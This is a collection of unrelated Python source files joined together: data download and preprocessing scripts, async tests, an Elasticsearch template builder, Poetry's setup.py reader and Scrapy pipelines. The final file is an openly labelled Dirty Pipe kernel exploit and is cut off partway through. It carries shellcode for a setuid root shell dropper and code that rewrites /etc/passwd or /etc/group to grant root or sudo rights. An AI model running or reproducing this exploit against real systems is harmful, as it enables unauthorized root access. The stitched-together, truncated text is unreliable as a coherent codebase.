print('Downloading {0}'.format(title))
resp = requests.get(url, stream=True)
try:
with open(output_path, 'wb') as f:
total_length = int(resp.headers.get('content-length'))
for chunk in bar(resp.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1, every=1000):
if chunk:
f.write(chunk)
f.flush()
except:
# Don't leave a half-written zip file
if path.exists(output_path):
os.remove(output_path)
raise
def _extract_downloaded_archive(output_path):
'''Extract a local archive, e.g. zip or tar, then
delete the archive'''
if output_path.endswith("tar.gz"):
with tarfile.open(output_path, "r:gz") as tar:
tar.extractall()
os.remove(output_path)
elif output_path.endswith("tar"):
with tarfile.open(output_path, "r:") as tar:
tar.extractall()
os.remove(output_path)
elif output_path.endswith("tar.bz2"):
with tarfile.open(output_path, "r:bz2") as tar:
tar.extractall()
os.remove(output_path)
elif output_path.endswith("zip"):
with zipfile.ZipFile(output_path, 'r') as zipf:
zipf.extractall()
os.remove(output_path)
def _process_dataset(dataset, output_dir, here):
'''Process each download spec in datasets.yml
Typically each dataset list entry in the yml has
"files" and "url" and "title" keys/values to show
local files that must be present / extracted from
a decompression of contents downloaded from the url.
If a url endswith '/', then all files given
are assumed to be added to the url pattern at the
end
'''
if not path.exists(output_dir):
os.makedirs(output_dir)
with DirectoryContext(output_dir):
requires_download = False
for f in dataset.get('files', []):
if not path.exists(f):
requires_download = True
break
if not requires_download:
print('Skipping {0}'.format(dataset['title']))
return
url = dataset['url']
title_fmt = dataset['title'] + ' {} of {}'
if url.endswith('/'):
urls = [url + f for f in dataset['files']]
output_paths = [os.path.join(here, 'data', fname)
for fname in dataset['files']]
unpacked = ['.'.join(output_path.split('.')[:(-2 if output_path.endswith('gz') else -1)]) + '*'
for output_path in output_paths]
else:
urls = [url]
output_paths = [path.split(url)[1]]
unpacked = dataset['files']
if not isinstance(unpacked, (tuple, list)):
unpacked = [unpacked]
zipped = zip(urls, output_paths, unpacked)
for idx, (url, output_path, unpack) in enumerate(zipped):
running_title = title_fmt.format(idx + 1, len(urls))
if glob.glob(unpack) or os.path.exists(unpack.replace('*','')):
# Skip a file if a similar one is downloaded:
# i.e. one that has same name but dif't extension
print('Skipping {0}'.format(running_title))
continue
_url_to_binary_write(url, output_path, running_title)
_extract_downloaded_archive(output_path)
def main():
'''Download each dataset specified by datasets.yml in this directory'''
here = path.abspath(path.join(path.split(__file__)[0]))
info_file = path.join(here, 'datasets.yml')
with open(info_file) as f:
info = ordered_load(f.read())
for topic, downloads in info.items():
output_dir = path.join(here, topic)
for d in downloads:
_process_dataset(d, output_dir, here)
if __name__ == '__main__':
main()
|
import asyncio
import pathlib
import pytest
@pytest.fixture
def examples_dir(request):
return pathlib.Path(request.config.rootdir) / "examples"
async def run_example(examples_dir, example_file):
"""
Run example and yield output line by line.
"""
proc = await asyncio.create_subprocess_exec(
"python",
str(examples_dir / example_file),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.STDOUT,
)
while True:
data = await proc.stdout.readline()
if data == b"":
break
line = data.decode("ascii").rstrip()
yield line
async def run_example_until(examples_dir, example_file, predicate_fn):
"""
Run example until it has matched a criteria for being considered successful.
"""
seen = []
# We expose this in the lambda to improve ergonomics
def contains_substring(word):
return any(word in x for x in seen)
async for line in run_example(examples_dir, example_file):
seen.append(line)
if predicate_fn(seen, contains_substring):
break
assert predicate_fn(seen, contains_substring)
@pytest.mark.asyncio
@pytest.mark.timeout(3)
async def test_request_example(examples_dir):
await run_example_until(
examples_dir,
"request_api.py",
lambda lines, contains: contains("Requesting")
and contains("Got answer: Yay")
and len(lines) >= 6,
)
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_inter_process_ping_pong_example(examples_dir):
await run_example_until(
examples_dir,
"inter_process_ping_pong.py",
lambda lines, contains: contains("Hello from proc1")
and contains("Hello from proc2")
and contains("Received via SUBSCRIBE API in proc2")
and contains("Received via SUBSCRIBE API in proc1")
and contains("Received via STREAM API in proc2"),
)
|
"""
build elasticsearch index template
"""
import json
import logging
import sys
logger = logging.getLogger(__name__)
def _get_template(schema, args):
# mapping = {
# field: {'type': 'keyword'}
# for field in set(f for v in schema.values() for f in v.get('args', {}).keys()
# | set(['id', 'year', 'nuts_level', 'fact_key']))
# }
# if args.fulltext:
# mapping['fulltext_suggest'] = {
# 'type': 'completion'
# }
# mapping['fulltext_suggest_context'] = {
# 'type': 'completion',
# 'contexts': [{
# 'name': 'suggest_context',
# 'type': 'category'
# }]
# }
return {
'index_patterns': [args.index_pattern],
'mappings': {
'properties': {**{
field: {'type': 'keyword'} for field in set(
dimension for statistic in schema.values()
for measure in statistic.get('measures', {}).values()
for dimension in measure.get('dimensions', {}).keys()
) | set(['region_id', 'nuts', 'lau', 'cube', 'statistic'])
}, **{'path': {'type': 'object'}, 'year': {'type': 'short'}}}
},
'settings': {
'index.mapping.total_fields.limit': 100000,
'index.number_of_shards': args.shards,
'index.number_of_replicas': args.replicas
}
}
def main(args):
with open(args.schema) as f:
schema = json.load(f)
sys.stdout.write(json.dumps(_get_template(schema, args), indent=2))
|
import shutil
import sys
from argparse import ArgumentParser
from collections import Counter
from pathlib import Path
from zipfile import ZipFile
import numpy as np
import pandas as pd
import requests
from src.config import CONTEXT_SIZE, COVERAGE, DATA_DIR, TEXT8_URL, VOCAB_SIZE
from src.utils.logger import get_logger
logger = get_logger(__name__)
def download_data(url=TEXT8_URL, dest_dir=DATA_DIR):
# prepare destination
dest = Path(dest_dir) / Path(url).name
dest.parent.mkdir(parents=True, exist_ok=True)
# downlaod zip
if not dest.exists():
logger.info("downloading file: %s.", url)
r = requests.get(url, stream=True)
with dest.open("wb") as f:
shutil.copyfileobj(r.raw, f)
logger.info("file downloaded: %s.", dest)
# extract zip
if not Path(dest_dir, "text8").exists():
with dest.open("rb") as f, ZipFile(f, "r") as zf:
zf.extractall(dest_dir)
logger.info("file extracted.")
def load_data(src_dir=DATA_DIR):
file_path = Path(src_dir, "text8")
with open(file_path) as f:
text8 = f.read()
logger.info("file loaded: %s.", file_path)
return text8
def process_data(text8, vocab_size=VOCAB_SIZE, coverage=COVERAGE, context_size=CONTEXT_SIZE):
text8_tokens = text8.split()
# create vocab
df_vocab = create_vocabulary(text8_tokens, vocab_size, coverage)
vocab_size, _ = df_vocab.shape
logger.info("vocab created, size: %s.", vocab_size)
# compute interaction
df_interaction = create_interaction_dataframe(text8_tokens, df_vocab, context_size)
df_interaction = create_glove_dataframe(df_interaction)
return {"vocabulary": df_vocab, "interaction": df_interaction}
def create_vocabulary(text_tokens, vocab_size=VOCAB_SIZE, coverage=COVERAGE):
tokens_counter = Counter(text_tokens)
# find cumulative proportion of token counts
counts = np.sort(list(tokens_counter.values()))[::-1]
total = np.sum(counts)
counts_cumprop = np.cumsum(counts) / total
# get count with defined coverage of total tokens
count_cutoff = counts[np.searchsorted(counts_cumprop, coverage)]
logger.info("count cufoff: %s; token coverage: %s.", count_cutoff, coverage)
# get vocab and counts
vocab = [token for token, count in tokens_counter.most_common(vocab_size) if count >= count_cutoff]
vocab_counts = [tokens_counter[token] for token in vocab]
unk_count = total - np.sum(vocab_counts)
df_vocab = pd.DataFrame({"token": ["<UNK>"] + vocab, "count": [unk_count] + vocab_counts})
df_vocab["proportion"] = df_vocab["count"] / total
df_vocab = df_vocab.sort_values("count", ascending=False).reset_index(drop=True)
return df_vocab
def create_interaction_dataframe(text_tokens, df_vocab, context_size=CONTEXT_SIZE):
token2id = {token: i for i, token in enumerate(df_vocab["token"])}
token_ids = (token2id.get(token, 0) for token in text_tokens)
df = pd.DataFrame(list(enumerate(token_ids)), columns=["position", "token_id"])
# cross join by position for right context only
df_concat = pd.concat([df.set_index(df["position"] + i + 1) for i in range(context_size)])
df_co = df_concat.join(df, how="inner", lsuffix="_row", rsuffix="_col")
df_co = df_co.loc[(df_co["token_id_row"] != df_co["token_id_col"]) &
(df_co["position_row"] < df_co["position_col"]), :]
df_co = df_co.assign(**{"value": 1 / (df_co["position_col"] - df_co["position_row"])})
# aggregate interactions
df_agg = (df_co.groupby(["token_id_row", "token_id_col"])["value"]
.agg(["count", "sum"])
.reset_index()
.rename(columns={"token_id_row": "row_token_id", "token_id_col": "col_token_id", "sum": "value"}))
df_agg = df_agg.loc[(df_agg["count"] != 0) & (df_agg["value"] != 0), :]
# union swap row and col since symmetric
dfs_agg = [df_agg, df_agg.rename(columns={"row_token_id": "col_token_id", "col_token_id": "row_token_id"})]
df_agg = (pd.concat(dfs_agg, sort=False)
.groupby(["row_token_id", "col_token_id"])
.sum()
.reset_index())
# get vocab info
df_agg["row_token"] = df_vocab["token"].to_numpy()[df_agg["row_token_id"]]
df_agg["col_token"] = df_vocab["token"].to_numpy()[df_agg["col_token_id"]]
df_agg = (df_agg.join(df_vocab.set_index("token"), on="row_token", rsuffix="_row")
.join(df_vocab.set_index("token"), on="col_token", rsuffix="_col"))
df_agg["neg_weight"] = df_agg["count_row"] * df_agg["proportion_col"]
df_agg = df_agg.drop(columns=["count_row", "proportion", "count_col", "proportion_col"])
# randomise dataframe
hashes = (df_agg["row_token"]
.str.cat(df_agg["col_token"], sep=" ")
.str.encode("utf8")
.apply(hash))
df_agg = df_agg.set_index(hashes).sort_index()
logger.info("interaction dataframe created.")
logger.info("dataframe shape: %s.", df_agg.shape)
return df_agg
def create_glove_dataframe(df, count_minimum=10):
# apply glove transformation
df = df[df["count"] >= count_minimum].copy()
df["glove_weight"] = glove_weight(df["count"])
df["glove_value"] = np.log(df["value"])
logger.info("dataframe shape: %s.", df.shape)
return df
def glove_weight(values, alpha=0.75, x_max=100):
return np.clip(np.power(values / x_max, alpha), 0, 1)
def save_data(data, save_dir=DATA_DIR):
# save vocab
df_vocab = data["vocabulary"]
csv_path = Path(save_dir, "vocab.csv")
df_vocab.to_csv(csv_path, index=False)
logger.info("vocabulary dataframe saved: %s.", csv_path)
txt_path = Path(save_dir, "vocab.txt")
txt_path.write_text("\n".join(df_vocab["token"]))
logger.info("vocabulary saved: %s.", txt_path)
# save interaction
df_interaction = data["interaction"]
csv_path = Path(save_dir, "interaction.csv")
df_interaction.to_csv(csv_path, index=False)
logger.info("interaction dataframe saved: %s.", csv_path)
return data
def main(url, dest, vocab_size, coverage, context_size, **kwargs):
download_data(url, dest)
text8 = load_data(dest)
data = process_data(text8, vocab_size, coverage, context_size)
save_data(data, dest)
if __name__ == "__main__":
parser = ArgumentParser(description="Download, extract and prepare text8 data.")
parser.add_argument(
"--url",
default=TEXT8_URL,
help="url of text8 data (default: %(default)s)"
)
parser.add_argument(
"--dest",
default=DATA_DIR,
help="destination directory for downloaded and extracted files (default: %(default)s)"
)
parser.add_argument(
"--vocab-size",
default=VOCAB_SIZE,
help="maximum size of vocab (default: %(default)s)"
)
parser.add_argument(
"--coverage",
type=float,
default=COVERAGE,
help="token coverage to set token count cutoff (default: %(default)s)"
)
parser.add_argument(
"--context-size",
type=int,
default=CONTEXT_SIZE,
help="size of context window (default: %(default)s)"
)
args = parser.parse_args()
logger.info("call: %s.", " ".join(sys.argv), extra={"ArgumentParser": args.__dict__})
logger.info("ArgumentParser: %s.", args.__dict__)
try:
main(**args.__dict__)
except KeyboardInterrupt:
pass
except Exception as e:
logger.exception(e)
raise e
|
from django.apps import AppConfig
class learnConfig(AppConfig):
name = "learn"
verbose_name = "learn"
|
from __future__ import annotations
import ast
from configparser import ConfigParser
from pathlib import Path
from typing import Any
from poetry.core.semver.version import Version
class SetupReader:
"""
Class that reads a setup.py file without executing it.
"""
DEFAULT: dict[str, Any] = {
"name": None,
"version": None,
"install_requires": [],
"extras_require": {},
"python_requires": None,
}
FILES = ["setup.py", "setup.cfg"]
@classmethod
def read_from_directory(cls, directory: str | Path) -> dict[str, Any]:
if isinstance(directory, str):
directory = Path(directory)
result = cls.DEFAULT.copy()
for filename in cls.FILES:
filepath = directory / filename
if not filepath.exists():
continue
read_file_func = getattr(cls(), "read_" + filename.replace(".", "_"))
new_result = read_file_func(filepath)
for key in result.keys():
if new_result[key]:
result[key] = new_result[key]
return result
def read_setup_py(self, filepath: str | Path) -> dict[str, Any]:
if isinstance(filepath, str):
filepath = Path(filepath)
with filepath.open(encoding="utf-8") as f:
content = f.read()
result: dict[str, Any] = {}
body = ast.parse(content).body
setup_call = self._find_setup_call(body)
if setup_call is None:
return self.DEFAULT
# Inspecting keyword arguments
call, body = setup_call
result["name"] = self._find_single_string(call, body, "name")
result["version"] = self._find_single_string(call, body, "version")
result["install_requires"] = self._find_install_requires(call, body)
result["extras_require"] = self._find_extras_require(call, body)
result["python_requires"] = self._find_single_string(
call, body, "python_requires"
)
return result
def read_setup_cfg(self, filepath: str | Path) -> dict[str, Any]:
parser = ConfigParser()
parser.read(str(filepath))
name = None
version = None
if parser.has_option("metadata", "name"):
name = parser.get("metadata", "name")
if parser.has_option("metadata", "version"):
version = Version.parse(parser.get("metadata", "version")).text
install_requires = []
extras_require: dict[str, list[str]] = {}
python_requires = None
if parser.has_section("options"):
if parser.has_option("options", "install_requires"):
for dep in parser.get("options", "install_requires").split("\n"):
dep = dep.strip()
if not dep:
continue
install_requires.append(dep)
if parser.has_option("options", "python_requires"):
python_requires = parser.get("options", "python_requires")
if parser.has_section("options.extras_require"):
for group in parser.options("options.extras_require"):
extras_require[group] = []
deps = parser.get("options.extras_require", group)
for dep in deps.split("\n"):
dep = dep.strip()
if not dep:
continue
extras_require[group].append(dep)
return {
"name": name,
"version": version,
"install_requires": install_requires,
"extras_require": extras_require,
"python_requires": python_requires,
}
def _find_setup_call(
self, elements: list[ast.stmt]
) -> tuple[ast.Call, list[ast.stmt]] | None:
funcdefs: list[ast.stmt] = []
for i, element in enumerate(elements):
if isinstance(element, ast.If) and i == len(elements) - 1:
# Checking if the last element is an if statement
# and if it is 'if __name__ == "__main__"' which
# could contain the call to setup()
test = element.test
if not isinstance(test, ast.Compare):
continue
left = test.left
if not isinstance(left, ast.Name):
continue
if left.id != "__name__":
continue
setup_call = self._find_sub_setup_call([element])
if setup_call is None:
continue
call, body = setup_call
return call, body + elements
if not isinstance(element, ast.Expr):
if isinstance(element, ast.FunctionDef):
funcdefs.append(element)
continue
value = element.value
if not isinstance(value, ast.Call):
continue
func = value.func
if not (isinstance(func, ast.Name) and func.id == "setup") and not (
isinstance(func, ast.Attribute)
and getattr(func.value, "id", None) == "setuptools"
and func.attr == "setup"
):
continue
return value, elements
# Nothing, we inspect the function definitions
return self._find_sub_setup_call(funcdefs)
def _find_sub_setup_call(
self, elements: list[ast.stmt]
) -> tuple[ast.Call, list[ast.stmt]] | None:
for element in elements:
if not isinstance(element, (ast.FunctionDef, ast.If)):
continue
setup_call = self._find_setup_call(element.body)
if setup_call is not None:
sub_call, body = setup_call
body = elements + body
return sub_call, body
return None
def _find_install_requires(self, call: ast.Call, body: list[ast.stmt]) -> list[str]:
install_requires: list[str] = []
value = self._find_in_call(call, "install_requires")
if value is None:
# Trying to find in kwargs
kwargs = self._find_call_kwargs(call)
if kwargs is None or not isinstance(kwargs, ast.Name):
return install_requires
variable = self._find_variable_in_body(body, kwargs.id)
if not isinstance(variable, (ast.Dict, ast.Call)):
return install_requires
if isinstance(variable, ast.Call):
if not isinstance(variable.func, ast.Name):
return install_requires
if variable.func.id != "dict":
return install_requires
value = self._find_in_call(variable, "install_requires")
else:
value = self._find_in_dict(variable, "install_requires")
if value is None:
return install_requires
if isinstance(value, ast.List):
for el in value.elts:
if isinstance(el, ast.Str):
install_requires.append(el.s)
elif isinstance(value, ast.Name):
variable = self._find_variable_in_body(body, value.id)
if variable is not None and isinstance(variable, ast.List):
for el in variable.elts:
if isinstance(el, ast.Str):
install_requires.append(el.s)
return install_requires
def _find_extras_require(
self, call: ast.Call, body: list[ast.stmt]
) -> dict[str, list[str]]:
extras_require: dict[str, list[str]] = {}
value = self._find_in_call(call, "extras_require")
if value is None:
# Trying to find in kwargs
kwargs = self._find_call_kwargs(call)
if kwargs is None or not isinstance(kwargs, ast.Name):
return extras_require
variable = self._find_variable_in_body(body, kwargs.id)
if not isinstance(variable, (ast.Dict, ast.Call)):
return extras_require
if isinstance(variable, ast.Call):
if not isinstance(variable.func, ast.Name):
return extras_require
if variable.func.id != "dict":
return extras_require
value = self._find_in_call(variable, "extras_require")
else:
value = self._find_in_dict(variable, "extras_require")
if value is None:
return extras_require
if isinstance(value, ast.Dict):
val: ast.expr | None
for key, val in zip(value.keys, value.values):
if not isinstance(key, ast.Str):
continue
if isinstance(val, ast.Name):
val = self._find_variable_in_body(body, val.id)
if isinstance(val, ast.List):
extras_require[key.s] = [
e.s for e in val.elts if isinstance(e, ast.Str)
]
elif isinstance(value, ast.Name):
variable = self._find_variable_in_body(body, value.id)
if variable is None or not isinstance(variable, ast.Dict):
return extras_require
for key, val in zip(variable.keys, variable.values):
if not isinstance(key, ast.Str):
continue
if isinstance(val, ast.Name):
val = self._find_variable_in_body(body, val.id)
if isinstance(val, ast.List):
extras_require[key.s] = [
e.s for e in val.elts if isinstance(e, ast.Str)
]
return extras_require
def _find_single_string(
self, call: ast.Call, body: list[ast.stmt], name: str
) -> str | None:
value = self._find_in_call(call, name)
if value is None:
# Trying to find in kwargs
kwargs = self._find_call_kwargs(call)
if kwargs is None or not isinstance(kwargs, ast.Name):
return None
variable = self._find_variable_in_body(body, kwargs.id)
if not isinstance(variable, (ast.Dict, ast.Call)):
return None
if isinstance(variable, ast.Call):
if not isinstance(variable.func, ast.Name):
return None
if variable.func.id != "dict":
return None
value = self._find_in_call(variable, name)
else:
value = self._find_in_dict(variable, name)
if value is None:
return None
if isinstance(value, ast.Str):
return value.s
elif isinstance(value, ast.Name):
variable = self._find_variable_in_body(body, value.id)
if variable is not None and isinstance(variable, ast.Str):
return variable.s
return None
def _find_in_call(self, call: ast.Call, name: str) -> Any | None:
for keyword in call.keywords:
if keyword.arg == name:
return keyword.value
return None
def _find_call_kwargs(self, call: ast.Call) -> Any | None:
kwargs = None
for keyword in call.keywords:
if keyword.arg is None:
kwargs = keyword.value
return kwargs
def _find_variable_in_body(
self, body: list[ast.stmt], name: str
) -> ast.expr | None:
for elem in body:
if not isinstance(elem, ast.Assign):
continue
for target in elem.targets:
if not isinstance(target, ast.Name):
continue
if target.id == name:
return elem.value
return None
def _find_in_dict(self, dict_: ast.Dict, name: str) -> ast.expr | None:
for key, val in zip(dict_.keys, dict_.values):
if isinstance(key, ast.Str) and key.s == name:
return val
return None
|
# -*- coding: utf-8 -*-
import re
import scrapy
import logging
from typing import List
from ..utils import get_soup
class ItemDebugPipeline(object):
"""Print item for debug"""
def process_item(self, item: scrapy.Item, spider: scrapy.Spider) -> List:
for k, v in item.items():
spider.log('{}: {}'.format(k, v), logging.INFO)
return item
class ImagePipeline(object):
"""Extract images from content, replace img tags with placeholder and populagte 'image_urls' for download"""
def process_item(self, item: scrapy.Item, spider: scrapy.Spider) -> List:
if 'content' in item:
s = get_soup(item['content'])
images = s.select('img')
if len(images):
item['image_urls'] = [x['src'] for x in images]
item['content'] = re.sub(r'<img src=[^>]+\>', '{{@IMG}}', item['content'])
else:
item['image_urls'] = []
return item
|
import logging
'''
G E T D A T A F R O M W O R D S U M
'''
'''
Get and check the file state is it has all the data for the word2vec.
'''
def get_file_state(text_model):
logging.debug("Getting file state :")
if 'fileState' in text_model:
file_state = text_model['fileState']
else:
file_state = None
return file_state
'''
Get narrator from all of the text model.
This returns a list of list paragraphs of list sentences.
'''
def get_text_model_narrator_paragraphs(text_model):
logging.debug("Getting all the narrator sentences of a text model")
paragraphs = []
for paragraph_model in text_model['paragraphStates']:
paragraphs.append(get_paragraph_model_narrator_sentences(paragraph_model))
return paragraphs
'''
Get the the narrator sentence from a paragraph.
'''
def get_paragraph_model_narrator_sentences(paragraph_model):
logging.debug("Getting all the narrator sentences of the paragraph model.")
paragraph = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['dialogState']['dialog'] == False:
paragraph.append(sentence_model['sentence'])
return paragraph
'''
Get narrator from all of the text model.
This returns a list of list paragraphs of list sentences.
'''
def get_text_model_dialog_paragraphs(text_model):
logging.debug("Getting all the narrator sentences of a text model")
paragraphs = []
for paragraph_model in text_model['paragraphStates']:
if paragraph_model['dialog'] == True:
paragraphs.append(get_paragraph_model_dialog_sentences(paragraph_model))
return paragraphs
'''
Get the the narrator sentence from a paragraph.
'''
def get_paragraph_model_dialog_sentences(paragraph_model):
logging.debug("Getting all the dialog sentences of the paragraph model.")
paragraph = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['dialogState']['dialog'] == True:
paragraph.append(sentence_model['sentence'])
return paragraph
'''
This will take a paragraph model and get the sentence objects that have dialog objects.
'''
def get_dialog_object_connected_narrative_paragraph_model(paragraph_model):
logging.debug("Getting get_paragraph_model_narrator_with_dialog_sentence")
dialog_sentence_obj = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['dialogState']['dialog'] == True and 'originOfDialogFromOrderParagraph' in sentence_model['dialogState']:
dialog_sentence_obj.append(sentence_model)
return dialog_sentence_obj
'''
This function gets the narrative sentence connected by syntax to the dialog object.
'''
def get_narrative_with_dialog_object_paragraph_model(paragraph_model, originOfDialogFromOrderParagraph):
logging.debug("Getting get_remainder_narrator_connected_with_dialog_sentence")
sentence_sentence_obj = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['orderParagraph'] == originOfDialogFromOrderParagraph:
sentence_sentence_obj.append(sentence_model)
return sentence_sentence_obj
'''
This functions gets all the dialog of dialog object.
'''
def get_dialog_connected_dialog_object_paragraph_model(paragraph_model, originOfDialogFromOrderParagraph):
logging.debug("Getting get_remainder_narrator_connected_with_dialog_sentence")
sentence_sentence_obj = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['orderParagraph'] == originOfDialogFromOrderParagraph:
sentence_sentence_obj.append(sentence_model)
return sentence_sentence_obj
|
################################################################################
# Author: Marc Bohler - https://github.com/crusoe112 #
# #
# Description: Uses Dirty Pipe vulnerability to pop a root shell using Python #
# #
# Credits: This code basically combines 2 existing poc's for dirty pipe: #
# https://github.com/febinrev/dirtypipez-exploit #
# https://github.com/eremus-dev/Dirty-Pipe-sudo-poc #
# Those projects, in turn, borrowed directly from the OG: #
# Max Kellermann max.kellermann@ionos.com #
# https://dirtypipe.cm4all.com/ #
# #
# Usage: python dirty.py #
# #
# Requirements: Requires python > 3.10 because of os.splice #
# #
# Notes: This exploit will overwrite a page of the file that resides in #
# the page cache. It is unlikely to corrupt the actual file. If #
# there is corruption or an error, you likely just need to wait #
# until the page is overwritten, or restart your computer to fix #
# any problems. #
# That being said, I bear no responsibility for damage done by #
# this code, so please read carefully and hack responsibly. #
# Be sure to check out Max Kellerman's writeup at cm4all.com as #
# well. #
################################################################################
import argparse
import sys
import pty
import os
import getpass
import subprocess
import platform
from os.path import exists
# Kernel page size
PAGE = 4096
# Linux pipe buffers are 64K
PIPESIZE = 65536
###########################################################
# Small (linux x86_64) ELF file matroshka doll that does: #
# fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); #
# write(fd, elfcode, elfcode_len) #
# chmod("/tmp/sh", 04755) #
# close(fd); #
# exit(0); #
# #
# The dropped ELF simply does: #
# setuid(0); #
# setgid(0); #
# execve("/bin/sh", ["/bin/sh", NULL], [NULL]); #
# #
# Credit: https://github.com/febinrev/dirtypipez-exploit #
###########################################################
elfcode = [
0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00,
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00,
0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7,
0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00,
0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c,
0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7,
0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7,
0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, 0x70, 0x2f,
0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01,
0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00,
0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00,
0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00,
0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00,
0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f,
0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
]
def backup_file(path, backup_path):
"""Back up just for working on the POC"""
with open(path, 'rb') as orig_file:
with open(backup_path, 'wb') as backup:
data = orig_file.read()
backup.write(data)
def prepare_pipe(read: int, write: int) -> None:
""" Contaminate the pipe flags by filling and draining """
data = b'a' * PIPESIZE
written = os.write(write, data)
print(f'[*] {written} bytes written to pipe')
data = os.read(read, PIPESIZE)
print(f'[*] {len(data)} bytes read from pipe')
def run_poc(data: bytes, path: str, file_offset: int) -> None:
""" Open target file, contaminate the pipe buff, call splice, write into target file """
print(f'[*] Opening {path}')
target_file = os.open(path, os.O_RDONLY)
print('[*] Opening PIPE')
r, w = os.pipe()
print('[*] Contaminating PIPE_BUF_CAN_MERGE flags')
prepare_pipe(r, w)
print(f'[*] Splicing byte from {path} to pipe')
n = os.splice(
target_file,
w,
1,
offset_src=file_offset
)
print(f'[*] Spliced {n} bytes')
print(f'[*] Altering {path}')
n = os.write(w, data)
print(f'[*] {n} bytes written to {path}')
def find_offset_of_user_in_passwd(user):
file_offset = 0
to_write = ''
with open('/etc/passwd', 'r') as passwd:
for line in passwd.readlines():
if not user in line:
file_offset += len(line)
else:
fields = line.split(':')
file_offset += len(':'.join(fields[:1]))
original = ':'.join(fields[1:]) # Save original for recovering
to_write = ':0:' + ':'.join(fields[3:]) # Set no passwd and uid 0
# Pad end of line with new line chars so we don't error
length_diff = len(original) - len(to_write)
if length_diff > 0:
to_write = to_write[:-1] + ('\n' * length_diff) + '\n'
return file_offset, to_write, original
return False
def find_offset_of_sudo_in_group(user):
file_offset = 0
to_write = ''
with open('/etc/group', 'r') as group:
orig_file = group.read()
group.seek(0)
for line in group.readlines():
fields = line.split(':')
if not fields[0].strip() == 'sudo':
file_offset += len(line)
else:
file_offset += len(line) - 1
to_write = f',{user}\n'
try:
# Save original for recovering
original = orig_file[file_offset:file_offset+len(to_write)]
except IndexError:
return False # Cannot be last line of file
return file_offset - 1, to_write, original
return False
def within_page_bounds(file_offset, data_len):
# Ensure that we are not at a page boundary
if file_offset % PAGE == 0:
print(f'[x] Cannot exploit start of page boundary with offset {file_offset}')
print('[x] Do you have access to another user?')
print('[x] Remember to clean up /tmp/backup_file')
return False
if (file_offset | PAGE) < (file_offset + data_len):
print(f'[x] Cannot perform exploit across page boundary with offset {file_offset}')
